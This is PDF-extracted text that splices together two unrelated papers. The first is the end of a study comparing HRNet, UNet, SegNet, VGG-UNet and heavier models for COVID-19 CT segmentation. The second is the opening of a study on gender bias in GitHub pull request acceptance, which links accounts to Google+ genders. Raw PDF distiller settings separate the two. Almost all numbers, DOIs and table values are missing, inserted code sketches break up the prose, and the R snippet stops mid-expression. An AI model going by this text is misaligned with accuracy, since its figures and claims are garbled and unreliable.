this is due to the parallel networks that are able to maintain essential information. hr net indicates a high accuracy of segmentation with an accuracy of . and a specificity of . . the performance is also compared against heavy weight models that have more parameters and layers than the iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lightweight models. the weight size is also considerably larger. as per our study, lightweight models offer better performance as compared to heavy weight models in all evaluation metrics. especially in dice coefficient, accuracy and precision, the lightweight models like hr net and unet offer better performance than inception resnetv and resnet . segnet and vgg unet are comparable to the performance of the heavy weight models. figures and shows the various outputs obtained from the models which segmented the positive tested and negative tested image respectively. hr net shows the best segmentation performance while unet shows good performance too. unet is able to obtain a proper boundary similar to the test image. seg net has performed poorly to segment the image. neither has it obtained a boundary nor has it segmented the finer details properly. the vgg unet has segmented the image properly but not to the extent of hr net or unet. we can see that hr net has the best performance. with decreased area, the performance decreases which means that unet is the second best performance, vgg unet is the third best and seg net has the worst performance amongst the models. when we compare figs. and with tables and , we can review the performance of the models on covid positive and negative slices. on comparing hr net with resnet and inceptionresnetv , we can see that hr net shows comparable performance to the heavy weight models but still performs better in terms of performance metrics like jaccard index and dice coefficient. this disparity is especially seen in terms of accuracy. the specificity of hr net is also much higher than the heavy weight models. this can be attributed to the method in which hr net extracts the features. even though the numbers of layers are more, it still retains a smaller size than the heavy weight models without sacrificing on performance. the next best performer is unet as can be seen from the images. unet is able to segment the boundaries and consistencies of the slices but cannot maintain the shape in all the predictions. vgg unet and seg net perform the worst each with having their own disadvantages. vgg unet might be better at detecting finer details in the lungs but cannot maintain the basic predictive ability to detect boundaries and textures. seg net performs the worst as it cannot segment even the most basic boundary or details. since it is used more as a segmentation algorithm for land masses, this makes sense for seg net to perform badly in the case of lung ct slices. table performance measures of segmentation performed on four light weight and two heavy weight models mentioned. method fprate fnrate tprate = sensitivity tnrate = specificity jaccard dice accuracy precision hr_net . . . . . . . . seg_net . . . . . . . . unet . . . . . . . . vgg_unet . . . . . . . . inception resnet v . . . . . . . . resnet . . . . . . . . iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure is the glyph plot which is a visual representation of the performance metrics for each model. 
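the entries in the table above are derived from pixel-level counts aggregated over the test set; a small numpy sketch (illustrative only) shows how the reported metrics follow from a predicted binary mask and its ground truth:

```python
# sketch: compute the reported metrics from binary predicted/ground-truth masks.
import numpy as np

def segmentation_metrics(pred, gt):
    pred, gt = pred.astype(bool), gt.astype(bool)
    tp = np.logical_and(pred, gt).sum()
    tn = np.logical_and(~pred, ~gt).sum()
    fp = np.logical_and(pred, ~gt).sum()
    fn = np.logical_and(~pred, gt).sum()
    eps = 1e-8  # avoid division by zero on empty masks
    return {
        "accuracy":    (tp + tn) / (tp + tn + fp + fn + eps),
        "precision":   tp / (tp + fp + eps),
        "sensitivity": tp / (tp + fn + eps),   # true positive rate
        "specificity": tn / (tn + fp + eps),   # true negative rate
        "dice":        2 * tp / (2 * tp + fp + fn + eps),
        "jaccard":     tp / (tp + fp + fn + eps),
    }
```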
the glyph plot is a good way to directly compare the performance of various models through the use of polygons. we can see that hr net has the best performance. the six points are the performance measures namely sensitivity, specificity, precision, accuracy, jaccard index and dice coefficient. with decreased area, the performance decreases which means that unet is the second best performance, vgg unet is the third best and seg net has the worst performance amongst the models. as can be seen from table , hr-net has the highest number of layers at , with other models having less than layers. but, hr-net has similar parameters to vgg unet and an even lesser number of parameters than segnet. this is due to the architecture of the hr-net. it is able to extract deeper features than the other models while maintaining the overall file size and number of parameters. the reason for hr-net having the figure covid positive tested with all the four lightweight and two heavy weight models. (a) original image and predictions from (b) unet (c) seg net (d) vgg unet (e) hr net (f) resnet and (g) inception resnetv . full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure covid negative tested with all the four lightweight and two heavy weight models. (a) original image and predictions from (b) unet (c) seg net (d) vgg unet (e) hr net (f) resnet and (g) inception resnetv . full-size doi: . /peerj-cs. /fig- table inference speed of the four light weight and two heavy weight models along with other parameters which affects the inference speed. name of model inference time (ms) number of layers number of params model size (mb) unet , , segnet , , vgg unet , , hr net , , inception resnet v , , resnet , , iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ highest performance is its architecture which makes it the best model to be used for fast inference. comparing the segnet, vgg unet and unet, segnet has the poorest inference speed at ms with the largest model size. it is therefore inferred that segnet is the worst model to use for the segmentation of covid- based on our study. vgg unet and unet have different metrics due to the fact that vgg unet is trained on the vgg- weights. it, therefore, takes far higher time to load on and produce an inference than unet. if hr-net cannot be used, vgg unet is the next best network for segmenting covid- . to check whether the performance of lightweight models is better than previous literature, we have checked the performance with “heavy-weight” models. heavy weight models can be classified as those models with more number of layers; parameters and weight file size in mega bytes (mb). the heavy weight models do not offer better performance than the lightweight models in terms of inference time. the heavy weight models are slower than the lightweight models in segmenting covid- from ct images and also, take up more memory space. while the inference time is faster than hr net, the number of parameters and model size does not allow the models to perform as well as the light weight models. conclusion in this article, we analyzed four models for segmenting covid- from lung ct images. with the growing number of cases worldwide, quick and accurate testing is needed. 
to solve this problem, we approached the problem by reviewing four lightweight models that do not take a long time for training or testing. first, we remove motion artifacts from figure glyph plot representing the performance of the models over the performance measures. (a) hr net; (b) seg net; (c) unet; (d) vgg unet (the points are the performance measures namely sensitivity, specificity, precision, accuracy, jaccard index and dice coe). full-size doi: . /peerj-cs. /fig- iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the tomographic images through thresholding and use the pre-processed images for training the models. the four models trained are seg net, unet, vgg unet and hr-net. we evaluate the models on their performance using accuracy, dice, jaccard index and precision. we also used specificity and sensitivity as secondary evaluation characteristics. the results obtained demonstrate that lightweight convolutional networks have high latent ability to segment covid- from ct images with hrnet being the best network out of the four models analyzed. our work can be used in real-time environments to deploy on low-power devices. low-power devices require less computation time and have many constraints. when we consider these constraints, then using our lightweight models is very efficient as the user can accurately segment covid- from ct images. this system can be used in the field where electricity is constrained and fast and accurate predictions are required. the proposed light weight model can be implemented a simpler hardware that requires less area and power requirements. due to the lower power usage, the prototype can be used as standalone systems in power constrained conditions but require accurate predictions. the results in this study can be improved by collecting more data from hospitals and clinics to improve the accuracy of the segmentation. we can also improve the work by changing the architecture of the proposed models to extract more features without increasing the inference time significantly. acknowledgements we would like to thank vit university for the nurturing environment as well as the exposure it provided for us to complete this project. we also would like to thank mosmeddata for the covid dataset which is used for this research work. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � tharun j. iyer performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. � alex noel joseph raj conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � sushil ghildiyal performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � ruban nersisson analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: code and data are available at github: https://github.com/iyeronfyer/covid- - segmentation.git. references ai t, yang z, hou h, zhan c, chen c, lv w, tao q, sun z, xia l. . 
correlation of chest ct and rt-pcr testing in coronavirus disease (covid- ) in china: a report of cases. radiology ( ):e –e doi . /radiol. . badrinarayanan v, kendall a, cipolla r. . segnet: a deep convolutional encoder-decoder architecture for image segmentation. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . capizzi g, sciuto gl, napoli c, polap d, woźniak m. . small lung nodules detection based on fuzzy-logic and probabilistic neural network with bio-inspired reinforcement learning. ieee transactions on fuzzy systems ( ): – . chan jfw, yuan s, kok kh, to kkw, chu h, yang j, xing f, liu j, yip ccy, poon rws, tsoi hw. . a familial cluster of pneumonia associated with the novel coronavirus indicating person-to-person transmission: a study of a family cluster. lancet ( ): – doi . /s - ( ) - . chen x, yao l, zhang y. . residual attention u-net for automated multi-class segmentation of covid- chest ct images. available at http://arxiv.org/abs/ . . devarapalli rm, kalluri hk, dondeti v. . lung cancer detection of ct lung images. international journal of recent technology and engineering ( s ): – . everingham m, eslami sa, van gool l, williams ck, winn j, zisserman a. . the pascal visual object classes challenge: a retrospective. international journal of computer vision ( ): – doi . /s - - - . hamer ow, salzberger b, gebauer j, stroszczynski c, pfeifer m. . ct morphology of covid- : case report and review of literature. röfo - fortschritte auf dem gebiet der röntgenstrahlen und der bildgebenden verfahren ( ): – doi . /a- - . iglovikov v, shvets a. . ternausnet: u-net with vgg encoder pre-trained on imagenet for image segmentation. available at http://arxiv.org/abs/ . . jamshidi m, lalbakhsh a, talla j, peroutka z, hadjilooei f, lalbakhsh p, jamshidi m, la spada l, mirmozafari m, dehghani m, sabet a. . artificial intelligence and covid- : deep learning approaches for diagnosis and treatment. ieee access : – doi . /access. . . jun m, cheng g, yixin w, xingle a, jiantao g, ziqi y, jian h. . covid- ct lung and infection segmentation dataset (version . ) [data set]. zenodo. doi . /zenodo. . ke q, zhang j, wei w, połap d, woźniak m, kośmider l, damaševĭcius r. . a neuro- heuristic approach for recognition of lung diseases from x-ray images. expert systems with applications ( ): – doi . /j.eswa. . . . khan zf. . automated segmentation of lung parenchyma using colour based fuzzy c-means clustering. journal of electrical engineering & technology ( ): – doi . /s - - - . li y, xia l. . coronavirus disease (covid- ): role of chest ct in diagnosis and management. american journal of roentgenology ( ): – doi . /ajr. . . iyer et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/iyeronfyer/covid- -segmentation.git https://github.com/iyeronfyer/covid- -segmentation.git http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /s - ( ) - http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /a- - http://arxiv.org/abs/ . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ajr. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ liu w, zhang q, chen j, xiang r, song h, shu s, chen l, liang l, zhou j, you l, wu p. . detection of covid- in children in early january in wuhan. china new england journal of medicine ( ): – doi . /nejmc . livne m, rieger j, aydin ou, taha aa, akay em, kossen t, madai vi. . 
a u-net deep learning framework for high performance vessel segmentation in patients with cerebrovascular disease. frontiers in neuroscience (feb): – doi . /fnins. . .
long j, shelhamer e, darrell t. . fully convolutional networks for semantic segmentation. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – .
mannem r, ca v, ghosh pk. . a segnet based image enhancement technique for air-tissue boundary segmentation in real-time magnetic resonance imaging video. in: th national conference on communications, ncc .
morozov sp, andreychenko ae, pavlov na, vladzymyrskyy av, ledikhova nv, gombolevskiy va, blokhin ia, gelezhe pb, gonchar av, chernina vy. . mosmeddata: chest ct scans with covid- related findings dataset. available at http://arxiv.org/abs/ . .
ronneberger o, fischer p, brox t. . u-net: convolutional networks for biomedical image segmentation. lecture notes in computer science : – .
sun k, xiao b, liu d, wang j. . deep high-resolution representation learning for human pose estimation. in: proceedings of the ieee computer society conference on computer vision and pattern recognition. piscataway: ieee, – .
sun k, zhao y, jiang b, cheng t, xiao b, liu d, mu y, wang x, liu w, wang j. . high-resolution representations for labeling pixels and regions. available at http://arxiv.org/abs/ . .
wieczorek m, siłka j, woźniak m. . neural network powered covid- spread forecasting model. chaos, solitons & fractals ( ): doi . /j.chaos. . .
world health organization. . who director general's remarks at the media briefing on -ncov on th february . available at https://www.who.int/dg/speeches/detail/who-director-general-s-remarks-at-the-media-briefing-on- -ncov-on- -february- .
zhu n, zhang d, wang w, li x, yang b, song j, zhao x, huang b, shi w, lu r, niu p. . a novel coronavirus from patients with pneumonia in china, . new england journal of medicine ( ): – doi . /nejmoa .
zu zy, jiang md, xu pp, chen w, ni qq, lu gm, zhang lj. . coronavirus disease (covid- ): a perspective from china. radiology ( ):e –e doi . /radiol. .
/colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . 
] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted august accepted march published may corresponding author emerson murphy-hill, emerson@csc.ncsu.edu academic editor arie van deursen additional information and declarations can be found on page doi . /peerj-cs. copyright terrell et al. 
distributed under creative commons cc-by . open access gender differences and bias in open source: pull request acceptance of women versus men josh terrell , andrew kofink , justin middleton , clarissa rainear , emerson murphy-hill , chris parnin and jon stallings department of computer science, california polytechnic state university—san luis obispo, san luis obispo, ca, united states department of computer science, north carolina state university, raleigh, nc, united states department of statistics, north carolina state university, raleigh, nc, united states abstract biases against women in the workplace have been documented in a variety of studies. this paper presents a large scale study on gender bias, where we compare acceptance rates of contributions from men versus women in an open source software community. surprisingly, our results show that women's contributions tend to be accepted more often than men's. however, for contributors who are outsiders to a project and whose gender is identifiable, men's acceptance rates are higher. our results suggest that although women on github may be more competent overall, bias against them exists nonetheless. subjects human-computer interaction, social computing, programming languages, software engineering keywords gender, bias, open source, software development, software engineering introduction in , a software developer named rachel nabors wrote about her experiences trying to fix bugs in open source software (http://rachelnabors.com/ / /of-github-and-pull-requests-and-comics/). nabors was surprised that all of her contributions were rejected by the project owners. a reader suggested that she was being discriminated against because of her gender. research suggests that, indeed, gender bias pervades open source. in nafus' interviews with women in open source, she found that "sexist behavior is...as constant as it is extreme" (nafus, ). in vasilescu and colleagues' study of stack overflow, a question and answer community for programmers, they found "a relatively 'unhealthy' community where women disengage sooner, although their activity levels are comparable to men's" (vasilescu, capiluppi & serebrenik, ). these studies are especially troubling in light of recent research which suggests that diverse software development teams are more productive than homogeneous teams (vasilescu et al., ). nonetheless, in a survey of the more than open source developers who indicated a gender, only . % were women (arjona-reina, robles & dueas, ). figure github user 'justinamiddleton' makes a pull request; the repository owner 'akofink' accepts it by merging it. the changes proposed by justinamiddleton are now incorporated into the project. this article presents an investigation of gender bias in open source by studying how software developers respond to pull requests, proposed changes to a software project's code, documentation, or other resources.
a successfully accepted, or ‘merged,’ example is shown in fig. . we investigate whether pull requests are accepted at different rates for self-identified women compared to self-identified men. for brevity, we will call these developers ‘women’ and ‘men,’ respectively. our methodology is to analyze historical github data to evaluate whether pull requests from women are accepted less often. while other open source communities exist, we chose to study github because it is the largest (gousios et al., ), claiming to have over million collaborators across million software repositories (https://github.com/about/press). the main contribution of this paper is an examination of gender differences and bias in the open source software community, enabled by a novel gender linking technique that terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/about/press http://dx.doi.org/ . /peerj-cs. associates more than . million community members to self-reported genders. to our knowledge, this is the largest scale study of gender bias to date in open source communities. related work a substantial part of activity on github is done in a professional context, so studies of gender bias in the workplace are relevant. because we cannot summarize all such studies here, we instead turn to davison and burke’s meta-analysis of papers, each studying between and participants, finding that male and female job applicants generally received lower ratings for opposite-sex-type jobs (e.g., nurse is a female sex-typed job, whereas carpenter is male sex-typed) (davison & burke, ). the research described in davison and burke’s meta-analysis can be divided into experiments and field studies. experiments attempt to isolate the effect of gender bias by controlling for extrinsic factors, such as level of education. for example, knobloch- westerwick, glynn & huge ( ) asked scholars to read and evaluate research paper abstracts, then systematically varied the gender of each author; overall, scholars rated papers with male authors as having higher scientific quality. in contrast to experiments, field studies examine existing data to infer where gender bias may have occurred retrospectively. for example, roth and colleagues’ meta-analysis of such studies, encompassing , participants, found that while women tend to receive better job performance ratings than men, women also tend to be passed up for promotion (roth, purvis & bobko, ). experiments and retrospective field studies each have advantages. the advantage of experiments is that they can more confidently infer cause and effect by isolating gender as the predictor variable. the advantage of retrospective field studies is that they tend to have higher ecological validity because they are conducted in real-world situations. in this paper, we use a retrospective field study as a first step to quantify the effect of gender bias in open source. several other studies have investigated gender in the context of software development. burnett and colleagues ( ) analyzed gender differences in studies that surveyed or interviewed a total of , programmers; they found substantial differences in software feature usage, tinkering with and exploring features, and in self-efficacy. arun & arun ( ) surveyed indian software developers about their attitudes to understand gender roles and relations but did not investigate bias. 
drawing on survey data, graham and smith demonstrated that women in computer and math occupations generally earn only about % of what men earn (graham & smith, ). lagesen contrasts the cases of western versus malaysian enrollment in computer science classes, finding that differing rates of participation across genders result from opposing perspectives of whether computing is a "masculine" profession (lagesen, ). the present paper builds on this prior work by looking at a larger population of developers in the context of open source communities. some research has focused on differences in gender contribution in other kinds of virtual collaborative environments, particularly wikipedia. antin and colleagues ( ) followed the activity of contributors with self-identified genders on wikipedia and found that, of the most active users, men made more frequent contributions while women made larger contributions. there are two gender studies about open source software development specifically. the first study is nafus' anthropological mixed-methods study of open source contributors, which found that "men monopolize code authorship and simultaneously de-legitimize the kinds of social ties necessary to build mechanisms for women's inclusion", meaning values such as politeness are favored less by men (nafus, ). the other is vasilescu and colleagues' ( ) study of , github contributors, where they inferred the contributors' gender based on their names and locations (and validated of those genders through a survey); they found that gender diversity is a significant and positive predictor of productivity. our work builds on this by investigating bias systematically and at a larger scale. general methodology our main research question was to what extent does gender bias exist when pull requests are judged on github? we answer this question from the perspective of a retrospective cohort study, a study of the differences between two groups previously exposed to a common factor to determine its influence on an outcome (doll, ). one example of a similar retrospective cohort study was krumholz and colleagues' ( ) review of , medical records to determine whether there exists gender bias in the treatment of men and women for heart attacks. other examples include the analysis of , school discipline files to evaluate whether gender bias exists in the administration of corporal punishment (gilbert, williams & lundberg, ) and the analysis of , research articles to evaluate whether gender bias exists in the peer reviewing process for the journal of the american medical association (shaw & braden, ). to answer the research question, we examined whether men and women are equally likely to have their pull requests accepted on github, then investigated why differences might exist. while the data analysis techniques we used were specific to each approach, there were several commonalities in the data sets that we used, as we briefly explain below. for the sake of maximizing readability of this paper, we describe our methodology in detail in the 'material and methods' appendix. we started with a ghtorrent (gousios, ) dataset that contained public data on pull requests from june , to april , , as well as data about users and projects. we then augmented this ghtorrent data by mining github's webpages for information about each pull request status, description, and comments.
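as a concrete illustration of this data preparation step, the sketch below (in r, not the authors' actual scripts) joins ghtorrent-derived pull request records with the status scraped from each pull request's web page; the file names and column names (pull_request_id, status) are hypothetical placeholders.

# hypothetical sketch of the augmentation step described above
ghtorrent_pulls <- read.csv("ghtorrent_pull_requests.csv", stringsAsFactors = FALSE)
scraped_status  <- read.csv("scraped_pull_status.csv", stringsAsFactors = FALSE)

# attach the scraped status (open / closed / merged) to each ghtorrent record
pulls <- merge(ghtorrent_pulls, scraped_status, by = "pull_request_id")

# how many pull requests fall into each outcome after augmentation
table(pulls$status)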
github does not request information about users' genders. while previous approaches have used gender inference (vasilescu, capiluppi & serebrenik, ; vasilescu et al., ), we took a different approach—linking github accounts with social media profiles where the user has self-reported gender. specifically, we extract users' email addresses from ghtorrent, look up that email address on the google+ social network, then, if that user has a profile, extract gender information from these users' profiles. out of , , github user profiles with email addresses, we were able to identify , , ( . %) of them as men or women through their public google+ profiles. we are the first to use this technique, to our knowledge. we recognize that our gender linking approach raises privacy concerns, which we have taken several steps to address. first, this research, which is based entirely on publicly available data, has undergone human subjects irb review. second, we have informed google about our approach in order to determine whether they believe our approach to linking email addresses to gender is a privacy violation of their users; they responded that it is consistent with google's terms of service (https://sites.google.com/site/bughunteruniversity/nonvuln/discover-your-name-based-on-e-mail-address). third, to protect the identities of the people described in this study to the extent possible, we do not plan to release our data that links github users to genders. results we describe our results in this section; data is available in supplemental files. are women's pull requests less likely to be accepted? we hypothesized that pull requests made by women are less likely to be accepted than those made by men. prior work on gender bias in hiring—that a job application with a woman's name is evaluated less favorably than the same application with a man's name (moss-racusin et al., )—suggests that this hypothesis may be true. to evaluate this hypothesis, we looked at the pull status of every pull request submitted by women compared to those submitted by men. we then calculate the merge rate and corresponding confidence interval, using the clopper–pearson exact method (clopper & pearson, ), and find the following (columns: gender, open, closed, merged, merge rate, % confidence interval):
women , , , . % [ . %, . %]
men , , , , . % [ . %, . %]
the hypothesis is not only false, but the difference is in the opposite direction from the one expected; women tend to have their pull requests accepted at a higher rate than men! this difference is statistically significant (χ² (df = , n = , , ) = , , p < . ). what could explain this unexpected result? open source effects perhaps our github data are not representative of the open source community; while all projects we analyzed were public, not all of them are licensed as open source. nonetheless, if we restrict our analysis to just projects that are explicitly licensed as open source, women continue to have a higher acceptance rate (χ² (df = , n = , , ) = , p < . ), as the following table shows (columns: gender, open, closed, merged, merge rate, % confidence interval):
women , , , . % [ . %, . %]
men , , , , . % [ . %, . %]
insider effects perhaps women's high acceptance rate is because they are already well known in the projects they make pull requests in. pull requests can be made by anyone, including both insiders (explicitly authorized owners and collaborators) and outsiders (other github users). if we exclude insiders from our analysis, the women's acceptance rate ( . % [ . %, . %]) continues to be significantly higher than men's ( . % [ . %, . %]) (χ² (df = , n = , , ) = , p < . ). experience effects perhaps only a few highly successful and prolific women, responsible for a substantial part of overall success, are skewing the results. to test this, we calculated the pull request acceptance rate for each woman and man with or more pull requests, then found the average acceptance rate across those two groups. the results are displayed in fig. . we notice that women tend to have a bimodal distribution, typically being either very successful (> % acceptance rate) or unsuccessful (< %). but these data tell the same story as the overall acceptance rate; women are more likely than men to have their pull requests accepted. why might women have a higher acceptance rate than men, given the gender bias documented in the literature? in the remainder of this section, we will explore this question by evaluating several hypotheses that might explain the result. do women's pull request acceptance rates start low and increase over time? one plausible explanation is that women's first few pull requests get rejected at a disproportionate rate compared to men's, so they feel dejected and do not make future pull requests. this explanation is supported by reagle's account of women's participation in virtual collaborative environments, where an aggressive argument style is necessary to justify one's own contributions, a style that many women may find to be not worthwhile (reagle, ). thus, the overall higher acceptance rate for women would be due to survivorship bias within github; the women who remain and do the majority of pull requests would be better equipped to contribute, and defend their contributions, than men. thus, we might expect that women have a lower acceptance rate than men for early pull requests but have an equivalent acceptance rate later. to evaluate this hypothesis, we examine pull request acceptance rate over time, that is, the mean acceptance rate for developers on their first pull request, second pull request, and so on. figure displays the results. orange points represent the mean acceptance rate for women, and purple points represent acceptance rates for men. shaded regions indicate the pointwise % clopper–pearson confidence interval.
figure histogram of mean acceptance rate per developer for women (mean . %, median . %) and men (mean . %, median . %). while developers making their initial pull requests do get rejected more often, women generally still maintain a higher rate of acceptance throughout. the acceptance rate of women tends to fluctuate at the right of the graph, because the acceptance rate is affected by only a few individuals. for instance, at pull requests, only women are represented.
intuitively, where the shaded region for women includes the corresponding data point for men, the reader can consider the data too sparse to conclude that a substantial difference exists between acceptance rates for women and men. nonetheless, between and pull requests, women's higher acceptance rate remains. thus, the evidence casts doubt on our hypothesis. are women focusing their efforts on fewer projects? one possible explanation for women's higher acceptance rates is that they are focusing their efforts more than men; perhaps their success is explained by doing pull requests on few projects, whereas men tend to do pull requests on more projects. first, the data do suggest that women tend to contribute to fewer projects than men. while the median number of projects contributed to via pull request is for both genders (that is, the th percentile of developers), at the th percentile it is for women and for men, and at the th percentile it is for women and for men. but the fact that women tend to contribute to fewer projects does not explain why women tend to have a higher acceptance rate. to see why, consider fig. ; on the y axis is mean acceptance rate by gender, and on the x axis is number of projects contributed to. when contributing to between and projects, women have a higher acceptance rate as they contribute to more projects. beyond projects, the % confidence interval indicates women's data are too sparse to draw conclusions confidently.
figure pull request acceptance rate over time.
figure pull request acceptance rate by number of projects contributed to.
are women making pull requests that are more needed? another explanation for women's pull request acceptance rate is that, perhaps, women disproportionately make contributions that projects need more specifically. what makes a contribution "needed" is difficult to assess from a third-party perspective. one way is to look at which pull requests link to issues in projects' github issue trackers. if a pull request references an issue, we consider it to serve a more specific and recognized need than an otherwise comparable one that does not. to support this argument with data, we randomly selected pull request descriptions that referenced issues; in cases, the reference was an attempt to fix all or part of an issue. based on this high probability, we can assume that when someone references an issue in a pull request description, they usually intend to fix a specific problem in the project. thus, if women more often submit pull requests that address a documented need and this is enough to improve acceptance rates, we would expect that these same requests are more often linked to issues.
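the acceptance rates, clopper–pearson intervals, and chi-squared comparisons reported in this section can be reproduced with base r; the sketch below uses invented counts purely for illustration (the paper's own values appear in the tables and figures above).

# clopper-pearson exact interval on a merge rate: binom.test() reports it
merged_w <- 111000; total_w <- 140000     # invented counts for women
merged_m <- 2100000; total_m <- 2900000   # invented counts for men
binom.test(merged_w, total_w)$conf.int    # exact interval for women's merge rate

# chi-squared test comparing the two merge rates, as in the chi-squared
# statistics quoted in the text
counts <- matrix(c(merged_w, total_w - merged_w,
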